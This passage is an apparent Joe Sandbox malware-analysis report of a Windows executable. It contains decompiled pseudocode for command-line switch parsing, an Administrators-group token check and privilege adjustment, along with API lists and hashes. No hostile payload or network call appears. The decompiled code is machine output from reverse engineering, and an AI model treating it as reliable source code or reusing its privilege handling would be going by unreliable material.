                                                                        				void* _t75;
                                                                        				char _t79;
                                                                        				void* _t83;
                                                                        				void* _t85;
                                                                        				void* _t87;
                                                                        				intOrPtr _t88;
                                                                        				void* _t100;
                                                                        				intOrPtr _t101;
                                                                        				CHAR* _t104;
                                                                        				intOrPtr _t105;
                                                                        				void* _t111;
                                                                        				void* _t115;
                                                                        				CHAR* _t118;
                                                                        				void* _t119;
                                                                        				void* _t127;
                                                                        				CHAR* _t129;
                                                                        				void* _t132;
                                                                        				void* _t142;
                                                                        				signed int _t143;
                                                                        				CHAR* _t144;
                                                                        				void* _t145;
                                                                        				void* _t146;
                                                                        				void* _t147;
                                                                        				void* _t149;
                                                                        				char _t155;
                                                                        				void* _t157;
                                                                        				void* _t162;
                                                                        				void* _t163;
                                                                        				char _t167;
                                                                        				char _t170;
                                                                        				CHAR* _t173;
                                                                        				void* _t177;
                                                                        				intOrPtr* _t183;
                                                                        				intOrPtr* _t192;
                                                                        				CHAR* _t199;
                                                                        				void* _t200;
                                                                        				CHAR* _t201;
                                                                        				void* _t205;
                                                                        				void* _t206;
                                                                        				int _t209;
                                                                        				void* _t210;
                                                                        				void* _t212;
                                                                        				void* _t213;
                                                                        				CHAR* _t218;
                                                                        				intOrPtr* _t219;
                                                                        				intOrPtr* _t220;
                                                                        				signed int _t221;
                                                                        				signed int _t223;
                                                                        
                                                                        				_t173 = __ecx;
                                                                        				_t61 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t61 ^ _t221;
                                                                        				_push(__ebx);
                                                                        				_push(__esi);
                                                                        				_push(__edi);
                                                                        				_t209 = 1;
                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                        					_t63 = 1;
                                                                        				} else {
                                                                        					L2:
                                                                        					while(_t209 != 0) {
                                                                        						_t67 =  *_t173;
                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                        							_t173 = CharNextA(_t173);
                                                                        							continue;
                                                                        						}
                                                                        						_v272 = _t173;
                                                                        						if(_t67 == 0) {
                                                                        							break;
                                                                        						} else {
                                                                        							_t69 = _v272;
                                                                        							_t177 = 0;
                                                                        							_t213 = 0;
                                                                        							_t163 = 0;
                                                                        							_t202 = 1;
                                                                        							do {
                                                                        								if(_t213 != 0) {
                                                                        									if(_t163 != 0) {
                                                                        										break;
                                                                        									} else {
                                                                        										goto L21;
                                                                        									}
                                                                        								} else {
                                                                        									_t69 =  *_t69;
                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                        										break;
                                                                        									} else {
                                                                        										_t69 = _v272;
                                                                        										L21:
                                                                        										_t155 =  *_t69;
                                                                        										if(_t155 != 0x22) {
                                                                        											if(_t202 >= 0x104) {
                                                                        												goto L106;
                                                                        											} else {
                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                        												_t177 = _t177 + 1;
                                                                        												_t202 = _t202 + 1;
                                                                        												_t157 = 1;
                                                                        												goto L30;
                                                                        											}
                                                                        										} else {
                                                                        											if(_v272[1] == 0x22) {
                                                                        												if(_t202 >= 0x104) {
                                                                        													L106:
                                                                        													_t63 = 0;
                                                                        													L125:
                                                                        													_pop(_t210);
                                                                        													_pop(_t212);
                                                                        													_pop(_t162);
                                                                        													return E003D6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                        												} else {
                                                                        													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                        													_t177 = _t177 + 1;
                                                                        													_t202 = _t202 + 1;
                                                                        													_t157 = 2;
                                                                        													goto L30;
                                                                        												}
                                                                        											} else {
                                                                        												_t157 = 1;
                                                                        												if(_t213 != 0) {
                                                                        													_t163 = 1;
                                                                        												} else {
                                                                        													_t213 = 1;
                                                                        												}
                                                                        												goto L30;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L131;
                                                                        								L30:
                                                                        								_v272 =  &(_v272[_t157]);
                                                                        								_t69 = _v272;
                                                                        							} while ( *_t69 != 0);
                                                                        							if(_t177 >= 0x104) {
                                                                        								E003D6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                        								asm("int3");
                                                                        								_push(_t221);
                                                                        								_t222 = _t223;
                                                                        								_t71 =  *0x3d8004; // 0xf4fc83b5
                                                                        								_v296 = _t71 ^ _t223;
                                                                        								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                        									0x4f0 = 2;
                                                                        									_t75 = E003D597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                        								} else {
                                                                        									E003D44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                        									 *0x3d9124 = E003D6285();
                                                                        									_t75 = 0;
                                                                        								}
                                                                        								return E003D6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                        							} else {
                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                        								if(_t213 == 0) {
                                                                        									if(_t163 != 0) {
                                                                        										goto L34;
                                                                        									} else {
                                                                        										goto L40;
                                                                        									}
                                                                        								} else {
                                                                        									if(_t163 != 0) {
                                                                        										L40:
                                                                        										_t79 = _v268;
                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                        											if(_t83 == 0) {
                                                                        												_t202 = 0x521;
                                                                        												E003D44B9(0, 0x521, 0x3d1140, 0, 0x40, 0);
                                                                        												_t85 =  *0x3d8588; // 0x0
                                                                        												if(_t85 != 0) {
                                                                        													CloseHandle(_t85);
                                                                        												}
                                                                        												ExitProcess(0);
                                                                        											}
                                                                        											_t87 = _t83 - 4;
                                                                        											if(_t87 == 0) {
                                                                        												if(_v266 != 0) {
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t215 =  &_v268 + _t167;
                                                                        														_t183 =  &_v268 + _t167;
                                                                        														_t50 = _t183 + 1; // 0x1
                                                                        														_t202 = _t50;
                                                                        														do {
                                                                        															_t88 =  *_t183;
                                                                        															_t183 = _t183 + 1;
                                                                        														} while (_t88 != 0);
                                                                        														if(_t183 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t205 = 0x5b;
                                                                        															if(E003D667F(_t215, _t205) == 0) {
                                                                        																L115:
                                                                        																_t206 = 0x5d;
                                                                        																if(E003D667F(_t215, _t206) == 0) {
                                                                        																	L117:
                                                                        																	_t202 =  &_v276;
                                                                        																	_v276 = _t167;
                                                                        																	if(E003D5C17(_t215,  &_v276) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		_t202 = 0x104;
                                                                        																		E003D1680(0x3d8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                        																	}
                                                                        																} else {
                                                                        																	_t202 = 0x5b;
                                                                        																	if(E003D667F(_t215, _t202) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		goto L117;
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																_t202 = 0x5d;
                                                                        																if(E003D667F(_t215, _t202) == 0) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	goto L115;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													 *0x3d8a24 = 1;
                                                                        												}
                                                                        												goto L50;
                                                                        											} else {
                                                                        												_t100 = _t87 - 1;
                                                                        												if(_t100 == 0) {
                                                                        													L98:
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t217 =  &_v268 + _t170;
                                                                        														_t192 =  &_v268 + _t170;
                                                                        														_t38 = _t192 + 1; // 0x1
                                                                        														_t202 = _t38;
                                                                        														do {
                                                                        															_t101 =  *_t192;
                                                                        															_t192 = _t192 + 1;
                                                                        														} while (_t101 != 0);
                                                                        														if(_t192 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t202 =  &_v276;
                                                                        															_v276 = _t170;
                                                                        															if(E003D5C17(_t217,  &_v276) == 0) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t104 = CharUpperA(_v267);
                                                                        																_t218 = 0x3d8b3e;
                                                                        																_t105 = _v276;
                                                                        																if(_t104 != 0x54) {
                                                                        																	_t218 = 0x3d8a3a;
                                                                        																}
                                                                        																E003D1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                        																_t202 = 0x104;
                                                                        																E003D658A(_t218, 0x104, 0x3d1140);
                                                                        																if(E003D31E0(_t218) != 0) {
                                                                        																	goto L50;
                                                                        																} else {
                                                                        																	goto L106;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													_t111 = _t100 - 0xa;
                                                                        													if(_t111 == 0) {
                                                                        														if(_v266 != 0) {
                                                                        															if(_v266 != 0x3a) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t199 = _v265;
                                                                        																if(_t199 != 0) {
                                                                        																	_t219 =  &_v265;
                                                                        																	do {
                                                                        																		_t219 = _t219 + 1;
                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                        																		if(_t115 == 0) {
                                                                        																			 *0x3d8a2c = 1;
                                                                        																		} else {
                                                                        																			_t200 = 2;
                                                                        																			_t119 = _t115 - _t200;
                                                                        																			if(_t119 == 0) {
                                                                        																				 *0x3d8a30 = 1;
                                                                        																			} else {
                                                                        																				if(_t119 == 0xf) {
                                                                        																					 *0x3d8a34 = 1;
                                                                        																				} else {
                                                                        																					_t209 = 0;
                                                                        																				}
                                                                        																			}
                                                                        																		}
                                                                        																		_t118 =  *_t219;
                                                                        																		_t199 = _t118;
                                                                        																	} while (_t118 != 0);
                                                                        																}
                                                                        															}
                                                                        														} else {
                                                                        															 *0x3d8a2c = 1;
                                                                        														}
                                                                        														goto L50;
                                                                        													} else {
                                                                        														_t127 = _t111 - 3;
                                                                        														if(_t127 == 0) {
                                                                        															if(_v266 != 0) {
                                                                        																if(_v266 != 0x3a) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	_t129 = CharUpperA(_v265);
                                                                        																	if(_t129 == 0x31) {
                                                                        																		goto L76;
                                                                        																	} else {
                                                                        																		if(_t129 == 0x41) {
                                                                        																			goto L83;
                                                                        																		} else {
                                                                        																			if(_t129 == 0x55) {
                                                                        																				goto L76;
                                                                        																			} else {
                                                                        																				goto L49;
                                                                        																			}
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																L76:
                                                                        																_push(2);
                                                                        																_pop(1);
                                                                        																L83:
                                                                        																 *0x3d8a38 = 1;
                                                                        															}
                                                                        															goto L50;
                                                                        														} else {
                                                                        															_t132 = _t127 - 1;
                                                                        															if(_t132 == 0) {
                                                                        																if(_v266 != 0) {
                                                                        																	if(_v266 != 0x3a) {
                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                        																			goto L49;
                                                                        																		}
                                                                        																	} else {
                                                                        																		_t201 = _v265;
                                                                        																		 *0x3d9a2c = 1;
                                                                        																		if(_t201 != 0) {
                                                                        																			_t220 =  &_v265;
                                                                        																			do {
                                                                        																				_t220 = _t220 + 1;
                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                        																				if(_t142 == 0) {
                                                                        																					_t143 = 2;
                                                                        																					 *0x3d9a2c =  *0x3d9a2c | _t143;
                                                                        																					goto L70;
                                                                        																				} else {
                                                                        																					_t145 = _t142 - 3;
                                                                        																					if(_t145 == 0) {
                                                                        																						 *0x3d8d48 =  *0x3d8d48 | 0x00000040;
                                                                        																					} else {
                                                                        																						_t146 = _t145 - 5;
                                                                        																						if(_t146 == 0) {
                                                                        																							 *0x3d9a2c =  *0x3d9a2c & 0xfffffffd;
                                                                        																							goto L70;
                                                                        																						} else {
                                                                        																							_t147 = _t146 - 5;
                                                                        																							if(_t147 == 0) {
                                                                        																								 *0x3d9a2c =  *0x3d9a2c & 0xfffffffe;
                                                                        																								goto L70;
                                                                        																							} else {
                                                                        																								_t149 = _t147;
                                                                        																								if(_t149 == 0) {
                                                                        																									 *0x3d8d48 =  *0x3d8d48 | 0x00000080;
                                                                        																								} else {
                                                                        																									if(_t149 == 3) {
                                                                        																										 *0x3d9a2c =  *0x3d9a2c | 0x00000004;
                                                                        																										L70:
                                                                        																										 *0x3d8a28 = 1;
                                                                        																									} else {
                                                                        																										_t209 = 0;
                                                                        																									}
                                                                        																								}
                                                                        																							}
                                                                        																						}
                                                                        																					}
                                                                        																				}
                                                                        																				_t144 =  *_t220;
                                                                        																				_t201 = _t144;
                                                                        																			} while (_t144 != 0);
                                                                        																		}
                                                                        																	}
                                                                        																} else {
                                                                        																	 *0x3d9a2c = 3;
                                                                        																	 *0x3d8a28 = 1;
                                                                        																}
                                                                        																goto L50;
                                                                        															} else {
                                                                        																if(_t132 == 0) {
                                                                        																	goto L98;
                                                                        																} else {
                                                                        																	L49:
                                                                        																	_t209 = 0;
                                                                        																	L50:
                                                                        																	_t173 = _v272;
                                                                        																	if( *_t173 != 0) {
                                                                        																		goto L2;
                                                                        																	} else {
                                                                        																		break;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										} else {
                                                                        											goto L106;
                                                                        										}
                                                                        									} else {
                                                                        										L34:
                                                                        										_t209 = 0;
                                                                        										break;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L131;
                                                                        					}
                                                                        					if( *0x3d8a2c != 0 &&  *0x3d8b3e == 0) {
                                                                        						if(GetModuleFileNameA( *0x3d9a3c, 0x3d8b3e, 0x104) == 0) {
                                                                        							_t209 = 0;
                                                                        						} else {
                                                                        							_t202 = 0x5c;
                                                                        							 *((char*)(E003D66C8(0x3d8b3e, _t202) + 1)) = 0;
                                                                        						}
                                                                        					}
                                                                        					_t63 = _t209;
                                                                        				}
                                                                        				L131:
                                                                        			}
                                                                        0x00000000
                                                                        0x003d6125
                                                                        0x003d6137
                                                                        0x003d613a
                                                                        0x003d613c
                                                                        0x003d613e
                                                                        0x003d613e
                                                                        0x003d6141
                                                                        0x003d6141
                                                                        0x003d6143
                                                                        0x003d6144
                                                                        0x003d614a
                                                                        0x00000000
                                                                        0x003d6150
                                                                        0x003d6152
                                                                        0x003d615c
                                                                        0x003d6170
                                                                        0x003d6172
                                                                        0x003d617c
                                                                        0x003d6190
                                                                        0x003d6190
                                                                        0x003d6196
                                                                        0x003d61a5
                                                                        0x00000000
                                                                        0x003d61ab
                                                                        0x003d61b9
                                                                        0x003d61c6
                                                                        0x003d61c6
                                                                        0x003d617e
                                                                        0x003d6180
                                                                        0x003d618a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d618a
                                                                        0x003d615e
                                                                        0x003d6160
                                                                        0x003d616a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d616a
                                                                        0x003d615c
                                                                        0x003d614a
                                                                        0x003d610b
                                                                        0x003d610e
                                                                        0x003d610e
                                                                        0x00000000
                                                                        0x003d5e59
                                                                        0x003d5e59
                                                                        0x003d5e5c
                                                                        0x003d604f
                                                                        0x003d6056
                                                                        0x00000000
                                                                        0x003d605c
                                                                        0x003d606e
                                                                        0x003d6071
                                                                        0x003d6073
                                                                        0x003d6075
                                                                        0x003d6075
                                                                        0x003d6078
                                                                        0x003d6078
                                                                        0x003d607a
                                                                        0x003d607b
                                                                        0x003d6081
                                                                        0x00000000
                                                                        0x003d6087
                                                                        0x003d6087
                                                                        0x003d608d
                                                                        0x003d609c
                                                                        0x00000000
                                                                        0x003d60a2
                                                                        0x003d60aa
                                                                        0x003d60b2
                                                                        0x003d60b7
                                                                        0x003d60bd
                                                                        0x003d60bf
                                                                        0x003d60bf
                                                                        0x003d60d6
                                                                        0x003d60e0
                                                                        0x003d60e7
                                                                        0x003d60f5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d60f5
                                                                        0x003d609c
                                                                        0x003d6081
                                                                        0x003d5e62
                                                                        0x003d5e62
                                                                        0x003d5e65
                                                                        0x003d5fd3
                                                                        0x003d5fe9
                                                                        0x00000000
                                                                        0x003d5fef
                                                                        0x003d5fef
                                                                        0x003d5ff7
                                                                        0x003d5ffd
                                                                        0x003d6003
                                                                        0x003d6006
                                                                        0x003d6011
                                                                        0x003d6014
                                                                        0x003d603d
                                                                        0x003d6016
                                                                        0x003d6018
                                                                        0x003d6019
                                                                        0x003d601b
                                                                        0x003d6033
                                                                        0x003d601d
                                                                        0x003d6020
                                                                        0x003d6029
                                                                        0x003d6022
                                                                        0x003d6022
                                                                        0x003d6022
                                                                        0x003d6020
                                                                        0x003d601b
                                                                        0x003d6042
                                                                        0x003d6044
                                                                        0x003d6046
                                                                        0x003d604a
                                                                        0x003d5ff7
                                                                        0x003d5fd5
                                                                        0x003d5fd8
                                                                        0x003d5fd8
                                                                        0x00000000
                                                                        0x003d5e6b
                                                                        0x003d5e6b
                                                                        0x003d5e6e
                                                                        0x003d5f8b
                                                                        0x003d5f99
                                                                        0x00000000
                                                                        0x003d5f9f
                                                                        0x003d5fa7
                                                                        0x003d5faf
                                                                        0x00000000
                                                                        0x003d5fb1
                                                                        0x003d5fb3
                                                                        0x00000000
                                                                        0x003d5fb5
                                                                        0x003d5fb7
                                                                        0x00000000
                                                                        0x003d5fb9
                                                                        0x00000000
                                                                        0x003d5fb9
                                                                        0x003d5fb7
                                                                        0x003d5fb3
                                                                        0x003d5faf
                                                                        0x003d5f8d
                                                                        0x003d5f8d
                                                                        0x003d5f8d
                                                                        0x003d5f8f
                                                                        0x003d5fc1
                                                                        0x003d5fc1
                                                                        0x003d5fc1
                                                                        0x00000000
                                                                        0x003d5e74
                                                                        0x003d5e74
                                                                        0x003d5e77
                                                                        0x003d5ea0
                                                                        0x003d5ebd
                                                                        0x003d5f79
                                                                        0x00000000
                                                                        0x003d5f7f
                                                                        0x003d5ec3
                                                                        0x003d5ec3
                                                                        0x003d5ecc
                                                                        0x003d5ed4
                                                                        0x003d5ed6
                                                                        0x003d5edc
                                                                        0x003d5edf
                                                                        0x003d5eea
                                                                        0x003d5eed
                                                                        0x003d5f3f
                                                                        0x003d5f40
                                                                        0x00000000
                                                                        0x003d5eef
                                                                        0x003d5eef
                                                                        0x003d5ef2
                                                                        0x003d5f34
                                                                        0x003d5ef4
                                                                        0x003d5ef4
                                                                        0x003d5ef7
                                                                        0x003d5f2b
                                                                        0x00000000
                                                                        0x003d5ef9
                                                                        0x003d5ef9
                                                                        0x003d5efc
                                                                        0x003d5f22
                                                                        0x00000000
                                                                        0x003d5efe
                                                                        0x003d5eff
                                                                        0x003d5f02
                                                                        0x003d5f16
                                                                        0x003d5f04
                                                                        0x003d5f07
                                                                        0x003d5f0d
                                                                        0x003d5f46
                                                                        0x003d5f46
                                                                        0x003d5f09
                                                                        0x003d5f09
                                                                        0x003d5f09
                                                                        0x003d5f07
                                                                        0x003d5f02
                                                                        0x003d5efc
                                                                        0x003d5ef7
                                                                        0x003d5ef2
                                                                        0x003d5f4c
                                                                        0x003d5f4e
                                                                        0x003d5f50
                                                                        0x003d5f54
                                                                        0x003d5ed4
                                                                        0x003d5ea2
                                                                        0x003d5ea4
                                                                        0x003d5eaf
                                                                        0x003d5eaf
                                                                        0x00000000
                                                                        0x003d5e79
                                                                        0x003d5e7d
                                                                        0x00000000
                                                                        0x003d5e83
                                                                        0x003d5e83
                                                                        0x003d5e83
                                                                        0x003d5e85
                                                                        0x003d5e85
                                                                        0x003d5e8e
                                                                        0x00000000
                                                                        0x003d5e94
                                                                        0x00000000
                                                                        0x003d5e94
                                                                        0x003d5e8e
                                                                        0x003d5e7d
                                                                        0x003d5e77
                                                                        0x003d5e6e
                                                                        0x003d5e65
                                                                        0x003d5e5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5dd0
                                                                        0x003d5dd0
                                                                        0x003d5dd0
                                                                        0x00000000
                                                                        0x003d5dd0
                                                                        0x003d5dce
                                                                        0x003d5dca
                                                                        0x003d5dba
                                                                        0x00000000
                                                                        0x003d5d00
                                                                        0x003d5dd9
                                                                        0x003d5e04
                                                                        0x003d61fe
                                                                        0x003d5e0a
                                                                        0x003d5e0c
                                                                        0x003d5e17
                                                                        0x003d5e17
                                                                        0x003d5e04
                                                                        0x003d6200
                                                                        0x003d6200
                                                                        0x00000000

                                                                        APIs
                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 003D5CEE
                                                                        • GetModuleFileNameA.KERNEL32(003D8B3E,00000104,00000000,?,?), ref: 003D5DFC
                                                                        • CharUpperA.USER32(?), ref: 003D5E3E
                                                                        • CharUpperA.USER32(-00000052), ref: 003D5EE1
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 003D5F6F
                                                                        • CharUpperA.USER32(?), ref: 003D5FA7
                                                                        • CharUpperA.USER32(-0000004E), ref: 003D6008
                                                                        • CharUpperA.USER32(?), ref: 003D60AA
                                                                        • CloseHandle.KERNEL32(00000000,003D1140,00000000,00000040,00000000), ref: 003D61F1
                                                                        • ExitProcess.KERNEL32 ref: 003D61F8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                        • String ID: "$"$:$RegServer
                                                                        • API String ID: 1203814774-25366791
                                                                        • Opcode ID: a09698a9dfff625c2b31efedba9b16f272d3a2821aa18bae882c4eed34f97352
                                                                        • Instruction ID: 9d5ced02aa5dd75331f441caba14f2da525fa44ed02fbb92731d5f1f59482bc2
                                                                        • Opcode Fuzzy Hash: a09698a9dfff625c2b31efedba9b16f272d3a2821aa18bae882c4eed34f97352
                                                                        • Instruction Fuzzy Hash: 48D18F73A08A459FDF379B38BC497F93B6AA755300F1500A7C496CA791DA708E828F50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E003D18A3(void* __edx, void* __esi) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				char _v20;
                                                                        				long _v24;
                                                                        				void* _v28;
                                                                        				void* _v32;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				signed int _t23;
                                                                        				long _t45;
                                                                        				void* _t49;
                                                                        				int _t50;
                                                                        				void* _t52;
                                                                        				signed int _t53;
                                                                        
                                                                        				_t51 = __esi;
                                                                        				_t49 = __edx;
                                                                        				_t23 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t23 ^ _t53;
                                                                        				_t25 =  *0x3d8128; // 0x2
                                                                        				_t45 = 0;
                                                                        				_v12 = 0x500;
                                                                        				_t50 = 2;
                                                                        				_v16.Value = 0;
                                                                        				_v20 = 0;
                                                                        				if(_t25 != _t50) {
                                                                        					L20:
                                                                        					return E003D6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                        				}
                                                                        				if(E003D17EE( &_v20) != 0) {
                                                                        					_t25 = _v20;
                                                                        					if(_v20 != 0) {
                                                                        						 *0x3d8128 = 1;
                                                                        					}
                                                                        					goto L20;
                                                                        				}
                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                        					L17:
                                                                        					CloseHandle(_v28);
                                                                        					_t25 = _v20;
                                                                        					goto L20;
                                                                        				} else {
                                                                        					_push(__esi);
                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                        					if(_t52 == 0) {
                                                                        						L16:
                                                                        						_pop(_t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                        						L15:
                                                                        						LocalFree(_t52);
                                                                        						goto L16;
                                                                        					} else {
                                                                        						if( *_t52 <= 0) {
                                                                        							L14:
                                                                        							FreeSid(_v32);
                                                                        							goto L15;
                                                                        						}
                                                                        						_t15 = _t52 + 4; // 0x4
                                                                        						_t50 = _t15;
                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                        							_t45 = _t45 + 1;
                                                                        							_t50 = _t50 + 8;
                                                                        							if(_t45 <  *_t52) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L14;
                                                                        						}
                                                                        						 *0x3d8128 = 1;
                                                                        						_v20 = 1;
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        			}


















                                                                        APIs
                                                                          • Part of subcall function 003D17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003D18DD), ref: 003D181A
                                                                          • Part of subcall function 003D17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 003D182C
                                                                          • Part of subcall function 003D17EE: AllocateAndInitializeSid.ADVAPI32(003D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003D18DD), ref: 003D1855
                                                                          • Part of subcall function 003D17EE: FreeSid.ADVAPI32(?,?,?,?,003D18DD), ref: 003D1883
                                                                          • Part of subcall function 003D17EE: FreeLibrary.KERNEL32(00000000,?,?,?,003D18DD), ref: 003D188A
                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 003D18EB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 003D18F2
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 003D190A
                                                                        • GetLastError.KERNEL32 ref: 003D1918
                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 003D192C
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 003D1944
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003D1964
                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 003D197A
                                                                        • FreeSid.ADVAPI32(?), ref: 003D199C
                                                                        • LocalFree.KERNEL32(00000000), ref: 003D19A3
                                                                        • CloseHandle.KERNEL32(?), ref: 003D19AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                        • String ID:
                                                                        • API String ID: 2168512254-0
                                                                        • Opcode ID: 174bf41a7177a32ba099b3fde2b1f79cef64ea86cb66bb75748ca9b68a156929
                                                                        • Instruction ID: fdeb67db6b83cc07b9013a96612ec9b7d83091a98f880d0e3601b3bff1ba47de
                                                                        • Opcode Fuzzy Hash: 174bf41a7177a32ba099b3fde2b1f79cef64ea86cb66bb75748ca9b68a156929
                                                                        • Instruction Fuzzy Hash: 6A312D72A01609BFDB229FA5FD59AAFBBBCFF04700F104426E545D2250D7309905CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 60%
                                                                        			E003D1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                        				void* _v28;
                                                                        				void* __ebx;
                                                                        				signed int _t13;
                                                                        				int _t21;
                                                                        				void* _t25;
                                                                        				int _t28;
                                                                        				signed char _t30;
                                                                        				void* _t38;
                                                                        				void* _t40;
                                                                        				void* _t41;
                                                                        				signed int _t46;
                                                                        
                                                                        				_t41 = __esi;
                                                                        				_t38 = __edi;
                                                                        				_t30 = __ecx;
                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                        					L12:
                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                        						L14:
                                                                        						if( *0x3d9a40 != 0) {
                                                                        							_pop(_t30);
                                                                        							_t44 = _t46;
